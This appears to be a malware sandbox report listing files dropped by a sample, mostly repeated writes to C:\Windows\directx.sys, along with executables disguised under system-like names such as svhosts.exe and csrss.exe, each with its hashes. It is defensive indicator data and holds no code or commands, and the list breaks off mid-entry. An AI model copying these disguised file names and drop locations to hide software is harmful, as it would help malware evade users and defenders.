844c08f1c9bbedcb83d24b72ea912cfba46221c0d4849d76e07263a5c0cea5fa

SHA512
1155c59cc9644593a4205e1cfd1ccec6bc8877da0867fb4f2594e77b8ca6015564b2d163a711e56f2878c1557af39304202fac34147876dc084efb25793921c8

Download Submit
C:\Users\Admin\AppData\Roaming\configurationValue\Explorers.exe

Filesize
335KB

MD5
894c2e356e72da7a60c2978a258b2081

SHA1
d9d57f6bf516c5a381df6d5a81d73314a9a60ffb

SHA256
6a76e1042b46a21b225b20eb8d93aac9afd4f028f2fa4c7d09d1f478a67a0352

SHA512
c73ddafd2bd0dd582dfb5030460d46b9ba7e9746e169131cc0bafdbda74792bfae2ce6604a9450b28284339915d07569596d1e32b21f1f176445432f8bcbdabf

Download Submit
C:\Users\Admin\AppData\Roaming\configurationValue\svhosts.exe

Filesize
297KB

MD5
8a70c2805c58fcca31037c6dd59e5833

SHA1
233491efa8aab92ecc929ae138fbfbf06877c992

SHA256
605636af0dd1495e8a4cbbf6492e5862a4e7536710b533ef1bf1bc8e2670f9d8

SHA512
e2041ea7139f34cc621ea0bc0e312cbf41431cdcf4dc5be0c68445bb90be47935e359b6956fe9819e25077bbe6ce1a72ca7349e3956adda3246100c747725c12

Download Submit
C:\Users\Admin\Pictures\xsRgt6UP1S0UzYOfHAquDfUY.exe

Filesize
7KB

MD5
77f762f953163d7639dff697104e1470

SHA1
ade9fff9ffc2d587d50c636c28e4cd8dd99548d3

SHA256
d9e15bb8027ff52d6d8d4e294c0d690f4bbf9ef3abc6001f69dcf08896fbd4ea

SHA512
d9041d02aaca5f06a0f82111486df1d58df3be7f42778c127ccc53b2e1804c57b42b263cc607d70e5240518280c7078e066c07dec2ea32ec13fb86aa0d4cb499

Download Submit
C:\Users\Admin\csrss.exe

Filesize
2.5MB

MD5
57df715c49e89e2f29e49df3c1d20fd1

SHA1
523aee6206075b01c103335d24c34e19594ba267

SHA256
0ceee8585049c6a00ab2eda61f1bdff3425e7ac9dc1e621ee056cf317bfd5903

SHA512
a1988595925ef0f5ad0f9a765322e6da834e5b0c2d87759d0aeac7fe8d8df8b9698113c5f99a9d7c3ac6656ec71868d0a08948fde796d090a8e970668bdfd309

Download Submit
C:\Windows\directx.sys

Filesize
53B

MD5
796cda5c6678235f642e840cb748d9f9

SHA1
a5085e29397c6077d5c19c371c0a3b529ad138e8

SHA256
a1a45db4d271260ec8725466fbf347cf29139c88bcdeac25506fe7b862e9bc14

SHA512
d767ab03ba8b527a57da0fc4d551fe37270e6a6fe769612b3ecbb0442e88d460efab7cb74e732931dded786d8b20966764cd0b4f8fd186f37dcf482850446334

Download Submit
C:\Windows\directx.sys

Filesize
50B

MD5
126ae17ea06b12428e497bcd2ec292c6

SHA1
eca1f8fb5467e29f77ddfbd681fc14965353acce

SHA256
e5a6a9372c0c460d3868acfe98631d86c12cb456d46f42de04c56229783c950b

SHA512
42b5ca6b0ef655c1ab78d4f312d1625f6698ef151d70d9e371b33e5c583c41cf9b485b357573363bd2de4329d47365c33d04b1aaf389a8ac4958748b85f1c919

Download Submit
C:\Windows\directx.sys

Filesize
55B

MD5
cc2f3b51f2e78cafce999e604a8b3277

SHA1
f2e64b7d1f0581052cbfea99a8a809922a62e69c

SHA256
e6475c558d13bbad756c32a904648acf36c3f9bddd7aad597847cc159696c06f

SHA512
2cba040b4f1a5e137e9e44b1364ccec43173b677a24a3318b599c86ea4482ae2aaeb9f2af3be72fe6514dda0879b0bd506acd1e08b48f963c6ae446fc06cb6a1

Download Submit
C:\Windows\directx.sys

Filesize
197B

MD5
bdc95679f9195c7437e7f0c6f253bc2e

SHA1
a55ac8e8402fce82e6b58516c89448f4c2ede2e7

SHA256
a190a3dd36859952016376ab921dc27c0cc90d2a226a6b1f4ac9b2bf89f34a6d

SHA512
f79f6148bf13ffea5c7b576225705a2b471aac452a3f3ed6cbdfab1bb666646a2d03254524b8bc53ce8088005b4761917c8ccf1ac808910e20ae6c938bf1b84c

Download Submit
C:\Windows\directx.sys

Filesize
57B

MD5
a8192623d645da9000e4f3a568195aed

SHA1
066e9abebc3a04f00b22241fb6f04bffd2f20db6

SHA256
2f4eedde33b87748b3d83803f75fd162efbcdb56f9f3650afb99a4b219c474df

SHA512
a9ce0e7fb3d91a70726ae7d8dc84bf6dfa9a18477929be568c00eb671a6c99dc639d35be4cd263bcbf173096f0b0466a61b355da8ec900a3534c0f146af675eb

Download Submit
C:\Windows\directx.sys

Filesize
50B

MD5
d0b3a5bb7daf98749400b3eee59baa68

SHA1
73d537fd37a47d5d62b4fbe1261743985e8f77ed

SHA256
1a485f5b144df18fc50e86f6322dd0b10e162b5e66bb648ae2b49fbfb1859711

SHA512
8c491ffab08dc216bf20e193a5666bd8e8a9f86d8a1d780f49d6d4ecc4e37c89570b0ee70f3c9bbb49dd054b71274ca51359be1013e8820ebf38713feb3100ef

Download Submit
C:\Windows\directx.sys

Filesize
26B

MD5
bdbbdb6bb855540b632cb90c239b5ea0

SHA1
c105fe4b58212a0e27ac3e6ae9e99bda062a84eb

SHA256
78c9b9910ac245a537589a7918a4582c517d257e52697111a6ae07723e836534

SHA512
d589a54dcff733f3446cc6ec3a00989f3720e8bc9e211b19899d4b1798c8ccf41a24ff052dc099e91d090f8d4375166a77211b96fbf28160e54f9bf814c66d1f

Download Submit
C:\Windows\directx.sys

Filesize
50B

MD5
5bb2731fe92658328160cccb5066374e

SHA1
68ab45602c0fa7c07f7b03a749e7c39b3010fc95

SHA256
ad4abe1bccb76fa3879c2df13f680c4076a5444cd5c745b24e01c79d3254dafa

SHA512
24f8f949a2338bffc341f54dfb9f65b06ea016f10583318fa82bf6b5a5ba7e01395229f45e81547770970dc81fc775dd7ec85805254123ed8287e7e6d7161263

Download Submit
C:\Windows\directx.sys

Filesize
50B

MD5
b45138705c7dbe102f384a196a05f69f

SHA1
2532034d22234151d37edba659097f4cfe6fa4f0

SHA256
c223033c97894b3445bac94a65de0949b138fc8921dca91487c9b265fc509d4b

SHA512
4be9f6c33ea6c81411e789c9821885d9101b11a6a8ed10fe12e0b0c499ccfe5c7a34523da91ae8b5b7a5ccbf3ec7bdecb37ad92a0e32903586e5656d5f5e1267

Download Submit
C:\Windows\directx.sys

Filesize
215B

MD5
8376bb108a4041f90beea3ce87bc7272

SHA1
e10435f80a344763f6700cb094d5e4c7c6964ada

SHA256
4301793183788e6339d526f6a7f8f3c652af049812b1815eb1ca2e8354a81280

SHA512
caff573bdafc83f5537f5667203849508d5944e805220dca5acddf3e305542ef914a361c688250cb45af77eb6d2e140cd59992205898727b3530c35562b6fe60

Download Submit
C:\Windows\directx.sys

Filesize
202B

MD5
18aab5d849adc33963a3701ed8e7352a

SHA1
f9dc8a96e328abf29c5a25f61cf38b61aa03e436

SHA256
b4eca7e48cbacc58e695ec693a0ab71c70dfdfab643a7f2b81a107ec74450e8d

SHA512
8a1c4a168b4f53b8afa69dfde835e974362a05b651bfaf61503abfdf433c025f7d1a43c3c07eb26637058ce600028489d4e6fca71e3428f8dfb6f52e07f94d6a

Download Submit
C:\Windows\directx.sys

Filesize
208B

MD5
a85bf8fe110e944b5df2420b15a55add

SHA1
082c472c4511499582b11b6e302e037d6a31c6b3

SHA256
deb9cea865bf210cc61e54d8403c4db94c6c0c43ac7a008263477bfda7ada3a1

SHA512
247901262b80e016107cb71bb86280e212cff3ba985ca6b36e7ddad8f2fe8436e4594951a81304419a2511e5647d689639f9999b0ef8a52084e68d829b17276d

Download Submit
C:\Windows\directx.sys

Filesize
208B

MD5
6326d255a5485bf0f773bb9621528898

SHA1
cb2cac253cd38e97fe2d601b048bad3ba2902ff8

SHA256
4b2d68f1b3023fe6e45095f5e78c254932d8b14a9d7fa99dbf892976653bd7ff

SHA512
a06e6084d55184d54c46f6bf59816a0cef434b0ce1303057e39e28fa4a96d1c07f13ad21819b3fcac4bac38df496e146d0f5b653cbc7756906f1614302688ef2

Download Submit
C:\Windows\directx.sys

Filesize
187B

MD5
d08cb8f9335cc313e6a97ee0a6dd35a6

SHA1
3f8da381722f82dacf86d95c311d8853c5323dd5

SHA256
5db97b452eba96592d7442299e0064453ef545cfbb6cbfc705867d3aef8f31c9

SHA512
4bee80d78827c45546ba0c94d120af1a73340bb895934f4d05ff20cfa366ee2407eced977907155d5cccce97588dbf916f76e03ef52e2329500bb600fb631ec3

Download Submit
C:\Windows\directx.sys

Filesize
203B

MD5
24249f8f8f3f9cca45b3de8ba716b880

SHA1
3a3277a2173e6272f12f5efedfddf29c8b32b387

SHA256
0ce2fed48715350ce94e180e8c2e4da373596acb9f4c99ceb1e2bf36b9de103a

SHA512
2215d2a510fc1f23d155f9f96254ef8a89b02824c674d669b7d97aa37d9e33c97af2fa35f7a08464d986731877f65a86b6ba596788260b9ce7c01ceda5e66a1d

Download Submit
C:\Windows\directx.sys

Filesize
208B

MD5
e13990e2a48b555b3355e2b6d7327e41

SHA1
0be3b713361ec0bbb4801ba99982b4ddc0d41d3e

SHA256
c0bb9f2283f16484312e38a2553b922f308e1b94aac33201073c98cf956e647f

SHA512
58499724323ed728864e2e92438ddbf7dfc54f468f98a2517bffa7ab7de9a5f52f235894b2fe70ed1e32ed0ff0be31bd8017af5b22f1192b6e536477d25134bd

Download Submit
C:\Windows\directx.sys

Filesize
184B

MD5
f7ebfc889b1094110d8edf82c395c910

SHA1
6f4ea44d664dbb5db2f685a04b11631ebd64ca94

SHA256
3b117b5607a426a638d771af6081b6fa9d071e8045a1647e6f3edc55b7a8a798

SHA512
2a1e6ef8eb2a9a2408b38acc8f776029b85bac1cc11daaab7de54c2454678062bd2a36ab19e6671dec91bfbd7e68d720de63f2f9effa38d8a98a33650f809f51

Download Submit
C:\Windows\directx.sys

Filesize
75B

MD5
d7a8138307dc3c2475c958ab70be082c

SHA1
1aacfd13f325f76392d5dc1ff3856585924d8133

SHA256
749ce297a57592f065a77cbbba87f0ac4b883daf412eb311bc2baf35087de22d

SHA512
01ee6571b3f9158532f0ec1855b5a00fe6409155d66be1346d6810f675e2a016e8a746ffb201aeaa2df47756607b37ca86aabda14a55a820bb0f60f73e54cefd

Download Submit
C:\Windows\directx.sys

Filesize
208B

MD5
d926568d83ebcd3cb5f0b9181e6858d5

SHA1
86eb273f55ee40d59e741199ee08544f125540e8

SHA256
946249ba7f410220c396e3a0c02a71e30a613ce4f18838f4627c1fafe70b8972

SHA512
a4d61363995eb027e92b33ee0883066a8674e6df6a585cc6ce8da11b954011ccf0363986bdca4551aa378adc43b8d3887dfccf6e8a4e3b1ecad0a8b07d5aa66f

Download Submit
C:\Windows\directx.sys

Filesize
208B

MD5
712995239ea8ccece02a272e05c602ba

SHA1
684062ad5376c810a6ad2a12df32d093248852fa

SHA256
8b4f2de3a5fe626ee19d75f6fe71dd82adb830fa653e569f509c717d09355c32

SHA512
e5b6d5b750596995b8f668946c7e5213b344f6e7f09ac98fa3457d59d3105a0a939615bfbbdeb9704f924e472199674870437ea7551f2c7faae24c7b90884d52

Download Submit
C:\Windows\directx.sys

Filesize
50B

MD5
35e934dd766d8cd40dd2ccd2672095d4

SHA1
4bb759efb2d7ce688374be3eb5c7ab9c619a62e3

SHA256
fb4b45f960d10a7459982218dbfbf571e8082ffc1bfe00ea65760fc1c3e555c9

SHA512
62fe571b857ae43206c4d0001e8338ca8c36018db83215d7c8692cb1fb12f709b715ec39c4b03751b943d0cf1d736674c098ccfb232b275c071e41af5a63a905

Download Submit
C:\Windows\directx.sys

Filesize
50B

MD5
ae5e26c63f849e1dd8ce5128b91aeb20

SHA1
60440cffbe9c1d7b3fd19b315f10f437e0131c72

SHA256
e45198f7517d23c669c49ae9f70cb7a03ea6c4476fd9a26118d62ee1e78ccea7

SHA512
b5df6de1bee01bb8d893cfc1344f6694aa51ce4e04e38b3b500e1652ac1b32b078a6accab89e77f6a35d6147f6c8bd5d5a6366e10e46b15ffcc4dbdd33e34d75

Download Submit
C:\Windows\directx.sys

Filesize
29B

MD5
e48dd15c2622de57f9d96167526aa29b

SHA1
227e44c82be64d3b54a0d237018a874ea16c6982

SHA256
b84d90ce79f74578bf032d5481e92435bb92dc5da421f090dacf3184478d0e60

SHA512
371d73f5ebbb28aa7ff462905c6176f35c817dc18bed35d06b6e68022c6887b871fcf655fd0190523ebf3a16818c8df3bb6479fb27aef2175fa0894105ec0aa0

Download Submit
C:\Windows\directx.sys

Filesize
49B

MD5
b2e3f66546a8d178fd0c065f54af9425

SHA1
e5cc43dd436549106dc78adb936cc7f819f9aeba

SHA256
2c2d12324cdd1b993953fb490ab4052671d836f259b6b6ae7bb65db6b222334b

SHA512
272ba25252aa29834a4a359a1460b36d0ad5d2bdcee0297541971cb3c1f57afb0e1b30e1226de58fc3d9e69a56dec91de6affbf34224cba5a9c7c1e35ba5777e

Download Submit
C:\Windows\directx.sys

Filesize
299B

MD5
304481de413448fad2c6cbe981bbf6bb

SHA1
2b420c6c52bea2df4a7bde804ae913232f9f864f

SHA256
a4da1d10bb154b009d31b7cf3160cd1b9fea025983deeba15906b13c4c038423

SHA512
a16dbe8e77f9da3e8c0340e7a1ff7a1d93c7c1edc37c0983b24862511a8c0b19560c3a5c15047ba8bc16c282441ed924d3b4b812379dfaf7a5dda6582079d4d4

Download Submit
C:\Windows\directx.sys

Filesize
208B

MD5
5672eb9898e53f6f7d797909dc12832e

SHA1
cac8afb63a3b2906134109735aeeb1860004b17f

SHA256
77af6639c8a5c5c748d74b09d0f29486f4d74aff31c28ce4389ea4248595a246

SHA512
84da7de572ec972d485cc578ff391bcacd8858b616085e6675fa425fa8e7e6ccf98fb93f6729bffc91d5b77e3a473684eac629f9e6929a0ad8cbea7e0eafe864

Download Submit
C:\Windows\directx.sys

Filesize
203B

MD5
39899f02cc69dd19121dd3263989713f

SHA1
a72626dd7de3440aba5680c63df7447d9f7ce8b0

SHA256
2ec27c455520816ce2f7b2dad0a9fc3c5027733832a170266acaa364e3aed070

SHA512
2089c20e10e4f1a61677cc18af7c96bb7c05e74788a5905be03c83b9c39093774aedf005ced50ae2e126c7b2c20f65273fd415ca56e6b390d4b39d30cb9c2b0b

Download Submit
C:\Windows\directx.sys

Filesize
211B

MD5
df94236865c70415b81dee7be64f706c

SHA1
768a22683834aeefea53f6f32ae7bc46c88e2dd4

SHA256
079ca4a5e07144e669ef71cc1809c8bfbc8501c2fa4e2e02d57f3e4f4f881ba9

SHA512
bee5b8f261585edb12517848f4f6091be1576bbc7aabd1a2f84434a84f46f43abcd033314e9d3c0062381b6fd8598dbae1e447a5af8b4dd8f3b6df43ea2be884

Download Submit
C:\Windows\directx.sys

Filesize
50B

MD5
782bc401c29c9cad0c2e4d213f39e957

SHA1
ce7da29214f3c8095e3c2edcc8af7a5c679c60e8

SHA256
85415498e4fb56f23eedf89c33a1a3c81c62bfff57f8647a53be5caaa5490dd9

SHA512
cc11470b7c891a9c129059bc2a4fef39f33dd554de3c9a2a2fe7186c98699d88bb2ae03961ca123000106e2b04d3b2cbdf0b00cde684ebf6ae0d3c90488d374a

Download Submit
C:\Windows\directx.sys

Filesize
208B

MD5
35db43e4d6f653eb8da2e1842c89332e

SHA1
5facb61f78d5aed80e3b4f08dc9a725dc52213dc

SHA256
b3a05497f890a0fb30bedc361d1ffb64a6662930486b1b5ed7818178fbe536c6

SHA512
e160c6d23a332bf5619616ecb9cf4ebefe316775d4d4f7cefff214eabb3966c9be8c8223a9224c683e42be8edf0e8439e5d17bca3a23d6afa32a91ed6a0e624a

Download Submit
C:\Windows\directx.sys

Filesize
206B

MD5
73a7701790362ade76b27dc4177cf78f

SHA1
352c0e006fc9f0114889234d97f10b3a3893ede1

SHA256
f31372fbe4bead00aeb1cecdd413d91804b110c50b7811dbfdefcb9b7d7b6f19

SHA512
09d28c7f646511338fe2c057e794273739ca7d82d09c264e71ad8d51bfaa882b0f2432ac6178df94f0d128095ffbbcf71006b011b9005ddbc423f36e67893811

Download Submit
C:\Windows\directx.sys

Filesize
206B

MD5
401d2bf3d492bd8c04e6b8876ea1df81

SHA1
0623098cfd6f628d016f6a6d8780d30736306359

SHA256
3cf97356073725acbfa68271e57ff5f5fd34c4c21d37c6ad0ea345f47677aa1b

SHA512
40a4cb3aa076e13d48885871529809ae9a045c5b8d19139e752c91d04c43fe4580ce22bcd7dc628559b80cf2e8b6ceffd9a20d6158b396c88e9f64ff6d857bb2

Download Submit
C:\Windows\directx.sys

Filesize
208B

MD5
16309e060e3e1f1c8ab75883155b47dc

SHA1
9f5813953f24b9ba1a9a101dfd2be61c46172fa8

SHA256
1770d6e65f920b173701c5a3a1148a028c599916e16db265240b3e9fcf15d69d

SHA512
7d394560140bf025904c75722eec532eff4b791ce95e1d36359195753455cdad0222934bcbdb46aa74f8290b074db6967f1bf322ce2824a3ee77efc0ae44ba64

Download Submit
C:\Windows\directx.sys

Filesize
207B

MD5
0856a0aa8a53ff9a34417ad9ae7db55a

SHA1
ce078684847f511a30572d3de2dc333ba65b0ecf

SHA256
23a35c6ea24372b3da1d865efd68b8f5e44079c3280d5f1605cf8195c9a52ecc

SHA512
2dd1cc55c7e66783552d3bc8a121d4f6f4708d4577760a37f5c7ae5e85a489f694a19183c84cf84b8c7522ba58b6bc4a0b74d1b326a6e33721a772c36cc6ce73

Download Submit
C:\Windows\directx.sys

Filesize
218B

MD5
5ed713831a4477dd6e94d35320c53167

SHA1
d3ecfef46af2d88518d8d03053c0472dda238f9a

SHA256
4a58dde06e4d3f2e571bbe6238e289c1b06794eba11aaf7fa8648f1c0e3e861d

SHA512
f43780ff7195313faeae3534b65f8a1bc9879de492ba76685d83d3ff232a5e2cae516e05c0e36c24f596f068c601cb774bb64fdbf3a7876960213cf3a008f14d

Download Submit
C:\Windows\directx.sys

Filesize
216B

MD5
653c0b10ad7be16defabbc42aa38e6e7

SHA1
6f28e4c4e530987cc6c6e25130263f80bfcad034

SHA256
e4c8dbc66a84a8b4eacc90fba820dbb347a346712c54f85c03a7198c18766583

SHA512
7eec1fca1df44c1aa8ebda0a0a2ccb1044c62776d778c70561d4e927ed5a702d8419c8009ea605393166b2be0c043e4f8690f0a5118f5adffa778b08f3a742e6

Download Submit
C:\Windows\directx.sys

Filesize
220B

MD5
204b8116be6e742e33e808dea0cde44b

SHA1
e1598ff60b9a3ce3e9beeb1b586d74691b77b213

SHA256
4a9b38f145869de162f2148745f888319fa3b08624099d691c6e014184e3c397

SHA512
d4ca9ca83d81ea8a6e5bd26b1455a61b87e1110b0f0ebff271adf80d71a51dc4c0f3c51b22cf539014063f248a8fe5923e710737012d706d183725adc4a5cb05

Download Submit
C:\Windows\directx.sys

Filesize
215B

MD5
6bd21c944c1fe44a0210c9167505c2d4

SHA1
d4b7415fcb85b852d288d5f12ee2aa7d1628ddaa

SHA256
f15eebc70c19c78d2c2febf221ea42e32501341f93d7b7163202257cb4f33b4b

SHA512
c5b54829ca974cded5643baa3c6ae297a3d87b25d288a276608c56a9e204239e465d37a6b3771eec097d3812eb4fa1a8a62c3d2aac8a66a7e59613ae872fc746

Download Submit
C:\Windows\directx.sys

Filesize
220B

MD5
24adbe04a486e3a7404460b7a537b086

SHA1
f9725a76df247682c8125b7bcee1b9cdd1d3ff5f

SHA256
cf65fbbf1b3057e419c9ee5e1752d55f0c61556c806ce2a8dce3e5f7d04b68b1

SHA512
f171e82092ec11bb37b9e4c516a9fcdd1e942ffc7d4f2b403e9a1de101673c31ef4eb0d3569074fb8f6fbb63dea7112fff2f3d59182411a8aeb64820cef2d4c3

Download Submit
C:\Windows\directx.sys

Filesize
220B

MD5
90dd96bdda8fa66edd26eae4c8919e7c

SHA1
9f6ad9f73ec4ec4a8c54e5dd71c9e09cc2c7b288

SHA256
d7b7931db23422125a9546e8fe81f6fd7595ebdfa03ccf507b0d3da0092facfe

SHA512
cbccd4b971d6cf3288eb5a453d30a73d772467fbfa3b6077dd8a54d808db6f0f9dc414e3527ce3bdab0e1487c5c6c5567cdaddd7331f745c32bf52b2e5fe35f2

Download Submit
C:\Windows\directx.sys

Filesize
213B

MD5
50be4775b3644ed605c028385f5e0e7d

SHA1
b8f9e5de5cae18dce33303113998f684c8e89108

SHA256
c38a543fb784a8563aac6c93da8a7bcb939169164c798bf94dc8e7567db3fe3b

SHA512
f98aa8aabdc547b3e074e2de13e9cea2156ec210889c857f11a3a9d127bd961d7882a2975cb197aa60e5e71771c5ef31111176b000e290a8d77e0c8ec78e6c6f

Download Submit
C:\Windows\directx.sys

Filesize
216B

MD5
b06b392a543bf343435bdd5167c167f6

SHA1
1452c908dcf4a728e689672ea85a2bf5cbe5659c

SHA256
8a2713d63f252539e405f06fdf40548cbd25fa737ca9dff5d431762b5e82bfc3

SHA512
de19c015b48080c74a817078a6cf50ce274d58ae9fd45156c87ae89116811df4c0df1ca84388d8756b1531270d0873e1c37583b4a9efed409431fc2472fffab6

Download Submit
C:\Windows\directx.sys

Filesize
220B

MD5
6bba53500fb8f482cfb40caf2c938059

SHA1
591ff23bca9aa83a3a014630867e14ecb4bac6d9

SHA256
1efaabf5fce37852fdca9361f4d91924bb65332167216fdf81745838d48da040

SHA512
116120e012522307f9237b8c2addc7f94013abc36c1416449cbbfb059e5992d74e3210161c4733bab20e48c6be761809e29fea885801c3f0a66aa5051ee51934

Download Submit
C:\Windows\directx.sys

Filesize
220B

MD5
8982a0ba3726cdf0392ffe6cff9e95b8

SHA1
6ecc30178c638d9406b312c03cbaabfa9b611714

SHA256
32381d23efeb5aaef4af6d6519972fb1aba3f16da40889a843e5f4113fdfc202

SHA512
7d90e86c6ab8e7ee0e403bc4a56764cebacf203e3590456827d0026c7d59b41f6ae2ce77b66be875f0eb2a5a9e69c1600bd03ae737f30956bb3887a4136b9393

Download Submit
C:\Windows\directx.sys

Filesize
208B

MD5
d8530d04bc22ebe3834aa65dca5d1c46

SHA1
84f3880781c801dd61469a02a74eeb1f3fcf0e42

SHA256
b0780b8afec6edf30246d741e325c096ece42ebbd49dc993adbb000b2203c2cd

SHA512
5f122dd9c8570b6ff3b36484c8f6c00fdfa3c0411f99c8172ebd7e8bd427bc4ddc4488142fb86edf75bdfa7e1700f1fd0b0488df305dbd5708a6835a3de93823

Download Submit
C:\Windows\directx.sys

Filesize
50B

MD5
0110808156c56b8a43a5dac917c8514d

SHA1
247423f162df51a7906a15d729a245c18da50627

SHA256
a8f628cc7d1d17789c67ebe1cdb3a67689a54a60c574cce9e46552917033fb96

SHA512
d47aa1663ec55657ba3544a79dbd5590e593aa4097849c2ae2ae35449eb39cce83895b31116dc56223f3176b0caf00a06f66c79e09b03ec25057de4d23cc9e07

Download Submit
C:\Windows\directx.sys

Filesize
57B

MD5
f046923ce76233bac755a938a8d2fcd8

SHA1
342ca052736a465ee7b643a9ecc8704dcc54ca6a

SHA256
0f4c78b892b84dfb22afd66646d6d0593812c2766908888786d3ebc0c7a7a6de

SHA512
22a8e71c405de6d26df120d4ae80084bc5ddba35362704713976cb4286f9a7a4e8592bed2960464cd274825df95cdfadd53e208fe6a1dcb90df2c99c4be5f531

Download Submit
C:\Windows\directx.sys

Filesize
47B

MD5
7039423033a93b3a724acb5f7b6e8296

SHA1
2f2e671e61310728adb68e13d05ae0704d6d3ee9

SHA256
e27780e58a7fe96c22502b3c128c9063a0a0f2d10181c1818fa9ea61a6e34c33

SHA512
cb0253a6cb879cae12fe2f7bd56ae55525e3d5a0cff4457f8272a45c4fffd0b9921f96cbf066fa5e8d45b6f310e9e9cdcdb6453f042faffd3dcd5a0d26bd7c71

Download Submit
C:\Windows\directx.sys

Filesize
50B

MD5
0c515a01a6758e48c3f527aa485c544d

SHA1
3dc6eb73cd102f3e98a6ffd444b567a1812113e2

SHA256
db9f1fcf71e84754a8ed6aea2533ed44ae5ba266f4eeba562d294c1b2e6a2681

SHA512
397eb57834acf15aff69b4da5eaf677e7922fc6982a877b82cbd6615c2a6fbcc88451a544d17d396465573c58a68d3987901c71424d6bc1a15f4a0289ce085b5

Download Submit
C:\Windows\directx.sys

Filesize
57B

MD5
ceb0bec2e15214998e974173b4a14515

SHA1
011ab74f32df083b5cc4b7954b4d4b7526ad14dd

SHA256
170193c294319068548376208291eff2d246a9436c46ef4bb9e67062b4b88839

SHA512
f99abbe615f06d1b286b23d61637cb6d8629edb52bc4afbd464aa3e33df16acff46af304210fe4d3ede8b72c38189c4c38c4b130a3678ba0e8b47d082825a783

Download Submit
C:\Windows\directx.sys

Filesize
50B

MD5
78d9410b474ff7fc792e2a840824b973

SHA1
da9633d470f6668e275a60433e92c2499fa58c78

SHA256
98e4ae2e3d4d6141325469f04334a7549316c3dde2ff56093b8f02c0358aeebe

SHA512
f3d986e00bbdb453611cca13f1aa458faa2acee36a0469229d263c4a0a721e6c13eb72ae723475ea14bcc37e41357d33167803518841559e8dd74e451c2fb780

Download Submit
C:\Windows\directx.sys

Filesize
208B

MD5
778b06912d335e16137874160ca9ab21

SHA1
d905e2b7328b7551b6a5d3bb3d12835716ff95c3

SHA256
7991d114e04b96e077fc6312494a34b2cdef8f95cc03a20df03af264832c5683

SHA512
9ac837975defc8b9a94ee5d4cc9b0b233871d1f602b7ba4e0abb741571eb9e7d3df209de2c9ced70ebabb6d32ce20e97a1f12ee03f808f7d291cc591c8e199e0

Download Submit
C:\Windows\directx.sys

Filesize
208B

MD5
3c008bae4117604f7d71749b43145585

SHA1
610108851419d2cdd9779992e18312a529b66ad1

SHA256
bd92ba9c0d8fd0f44420f373b8cb590c3c9ee62aa607937f8bcf3c319d79d07a

SHA512
7518bf0a5240ccb448a3f87c99ecd050022682ac0402acb9220dc5b535390c44b0690658007201491cb8903ca3c8773c7d177b81ebe2dfa05c2e53ea3d83199c

Download Submit
C:\Windows\directx.sys

Filesize
208B

MD5
5957bc380588e0fa6a3024c22c03df11

SHA1
dc67a6a26339245616f1c115c36a067b036ddd56

SHA256
cb0fba8e2fe6501e382a1debec9af23ba913e61e79f88dd964d9d53578b0eb1b

SHA512
658f108c636fa74624ecb0dfef2403fd5429a03d1fd0916b5ce05e653ed7e69c70c9d29e648f9d72bd4cf1ba33297effc8edc142b8ce908b1299dbb711fc50b2

Download Submit
C:\Windows\directx.sys

Filesize
207B

MD5
c4c5ed8ddc9ab7ea1c9fc8b96bcc00f9

SHA1
e4a8ea0682f342b5e66186a0b56ee4f6182591d6

SHA256
6d710ecfaeb807fadd809524ef8bf5d83c465f8d62b709d042d3fd2b41a19776

SHA512
e313937dce8d1f5eb8039da61af02b9d4218b730f2cc0762f12067e7f68110910b520b99d78ea7c5f8993809931cba5fc8811d92ea486917da6cafaa8ee9b3e2

Download Submit
C:\Windows\directx.sys

Filesize
187B

MD5
c1ad4c2a9119893d3f46e7fd53358c9d

SHA1
9a212d48699a730ce76ed0fb0102687e9725006a

SHA256
20c5b1aa640f9696225fd80657cd0b55ca1fc33cee4c1892f40b47a6733287d8

SHA512
aabed0ba452c35cbe7254c09afcb14b8862f3a2e6ca230fc3bb66245acc4a086c8c088dba8f68a4ee24aefdbf8a8d644d5b62bfdbacf9ca91566694d3cb9a041

Download Submit
C:\Windows\directx.sys

Filesize
50B

MD5
3b9636015d7f156775dedb8b9ecaeb03

SHA1
082a9a8566c936f5b7f318b7e462eb8c1bdc9bcc

SHA256
6dbad1ca6beb0f084c4b5773bb567764991ba1304153f52fb843d29ae28e1f63

SHA512
a8cb9c3ac74ca2d144db3086005d47f2fe620a3aa1244e3cfb22a4aa570bb7c4c0f2b6441a599889a5db3a8f3556bcb50d81ffe2de919bf4baa817221ff9e6a6

Download Submit
C:\Windows\directx.sys

Filesize
45B

MD5
80b98a9595e11c90e5f3767a8b2c2cd2

SHA1
d99eaa34888d87a83dcb05cf65ce5aacea163be9

SHA256
b710920299942e61b0426e55fbf37077fc85ae741e8f7b85d9ccda9c9d0ca202

SHA512
483bee7187a43e2747255c510a109f375efea11b36b1ff26fbd1a67b398ed5c249a544245456cba851c2372b73f1b49da20da38e4f98220099cfacc822eba335

Download Submit
C:\Windows\directx.sys

Filesize
196B

MD5
b95346eac6d1e67427e74b364be54741

SHA1
d26c3165d34818b6d77b47a6f6c200496809dbc3

SHA256
e652f605aa3ff1fe2379be849ef6ecf96f91c724be329f0efab024152fe817a8

SHA512
3b307eac9636999993f74e2bb1b2315fc54b01dca3faf59716961442a690b16be72a7a0f9232fb52d0f62e25adfab777ada7d0b8e7eeb554c348f89c948450a6

Download Submit
C:\Windows\directx.sys

Filesize
50B

MD5
062d8b3d7c646fc62d9fde9913e54d36

SHA1
40eb5bca124d35cda4583eed02b9b0c378448208

SHA256
cc76cdf2c1b8083263b65cc733be6ddbb62c85d93fd7a963f0a44031a9ca54d8

SHA512
ab82fab46569e4b2bda7573c4fc59e2e6ce1300562ec3457456d9523780030722c2b9c5b399d84fd1d9bcf850341ddf12784c6c14bebdf80305f864fa4baded8

Download Submit
C:\Windows\directx.sys

Filesize
49B

MD5
54b6d012938c1f436bab23cef00cb055

SHA1
af8e19691dc371c8b0cb9768e2e91dcc26a2d4c7

SHA256
58c6dc8c5efa127db6c2bde73bc82947b19eb757e93da1dd367d9f4945316cb5

SHA512
6c2a6214ad61fb4875fc7e7cde5ef5b8f63a98736cc2b3e2feaef802d99d6f105a42c7814fc637b94744eca90674ffca622629d1259c47d9106f45b0d0130667

Download Submit
C:\Windows\directx.sys

Filesize
50B

MD5
1052618e299fa4e0cb567b59fa53ffe1

SHA1
adde10b72cdb00bded195526546a9c1a1a31e0cf

SHA256
2b4662f33d0edfcc43f60c9d40cde890a86b03295ecbe09eb9e3bc7b2968a13f

SHA512
0c14fc32a59281d4c4f20d2b566999a2668d73dfc0c2a04e6a09821f3db6030fec82e1d411ea21a5f27b8b1282147f95e72708f843312fe4b9acd814e99320af

Download Submit
C:\Windows\directx.sys

Filesize
107B

MD5
2a0d20e36d553ca4146b188b149ca44d

SHA1
